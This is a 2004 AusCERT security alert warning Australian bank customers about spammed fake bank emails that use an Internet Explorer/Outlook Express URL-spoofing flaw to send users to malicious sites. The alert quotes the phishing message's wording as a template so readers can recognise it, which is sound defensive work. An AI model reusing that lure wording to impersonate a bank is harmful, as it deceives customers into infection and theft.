From; AL-2004.10 -- AUSCERT ALERT -- http://www.auscert.org.au/3981 Bogus Banking Email Allows Trojan Infection for Outlook Users ----------------------------------------------------------------------------- --- Date: 04 April 2004 AusCERT Cross Reference #: AA-2003.04, AL-2003.04 -----BEGIN PGP SIGNED MESSAGE----- ================================================== A U S C E R T A L E R T AL-2004.10 -- AUSCERT ALERT Bogus Banking Email Allows Trojan Infection for Outlook Users 4 April 2004 ================================================== AusCERT Alert Summary --------------------- Product: Microsoft Internet Explorer 6 Microsoft Internet Explorer 5.01 Microsoft Internet Explorer 5.5 Microsoft Outlook Express 6 Microsoft Outlook Express 5.5 Microsoft Outlook Express 5 Operating System: Windows Impact: Execute Arbitrary Code/Commands Access Privileged Data Access Required: Remote PROBLEM: A vulnerability in Microsoft Internet Explorer and Outlook Express is being used to trick online banking customers into visiting a malicious web site. The vulnerability[2] allows a URL to be spoofed by manipulating the information displayed in the status bar using an embedded form. Ordinarily, this behaviour is not possible to achieve without scripting, overriding the protection of and making execution possible in the context of the "Restricted" zone where scripting is disabled by default. A bogus email message exploiting this vulnerability is currently being heavily spammed to Australian users. There are at least four known variants of the same email message - each appearing to come from a major Australian bank, with a "From:" field likely to be a valid email address for the respective institution to augment the deception. The body text of the message appears to the user like this: Dear user! We are informing you that today, the amount of $XXX AUD has been drawn out of your account. Technical assistance of YYY Bank. http://www.ZZZ.com.au Moving the mouse over the URL will not reveal the true destination in the status area of the email or browser window; it will appear the same as in the text. Clicking the link, however, will initiate a connection to a malicious site, the impact of which could include the downloading of a binary program and execution of malicious commands on the user's computer. At this time AusCERT is not aware of any available patch from Microsoft for this vulnerability. The impact on users of this vulnerability is similar to that reported in AA-2003.04[3]. PLATFORM: Affects Windows platforms running Internet Explorer and Outlook Express. IMPACT: Execute commands on the local computer and/or capture private information, including the logging of keystroke commands. MITIGATION: AusCERT recommends users not to follow the URL in any email they receive that has the format shown in this alert, nor should they respond to or follow any instructions in the message. It is advisable to remain aware of the potential for undesirable consequences that could arise from following URLs in unsolicited messages. In general, banking customers should always contact their financial institution if they are unsure of the authenticity of an unsolicited message that purports to be from their bank. More information about online banking safety is available in AL-2003.04[4], and users are strongly advised to reread this document. Users should, as ever, remain aware of the danger of opening unsolicited email attachments and review the advice in the article "Protecting your computer from malicious code"[3]. REFERENCES: [1] Protecting your computer from malicious code http://www.auscert.org.au/render.html?it=3352 [2] Secunia Security Advisory http://secunia.com/advisories/11273 [3] AusCERT Advisory AA-2003.04 http://www.auscert.org.au/render.html?it=3680 [4] Advisory Alert AL-2003.04 http://www.auscert.org.au/render.html?it=2909 - --------------------------------------------------------------------------- The AusCERT team has made every effort to ensure that the information contained in this security bulletin is accurate at the time of publication. However, the decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation\'s site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. If you believe that your computer system has been compromised or attacked in any way, we encourage you to let us know by completing the secure National IT Incident Reporting Form at: http://www.auscert.org.au/render.html?it=3192 AusCERT maintains a World Wide Web service which is found on: http://www.auscert.org.au. Internet Email: auscert@xxxxxxxxxxxxxx Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. Postal: Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 AUSTRALIA =================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv Comment: http://www.auscert.org.au/render.html?it=1967 iQCVAwUBQHACgyh9+71yA2DNAQH6SgP/ZCuWiLmkCuglO2ngYJ9uIFRNVDFk0voD J3KKdoLIESv+tHVdNVYslSwu7WPVMW3AlP1fju2dd0+VA0Cb9/VVUjWwtR309X0C kdU0DyWCAWVv5R4nYi7YfGUmFF0BPKndyDo77mchfgjChAk/VlP5GYcA8iYmPECu hlqaTbpNjdg= =OyrJ -----END PGP SIGNATURE-----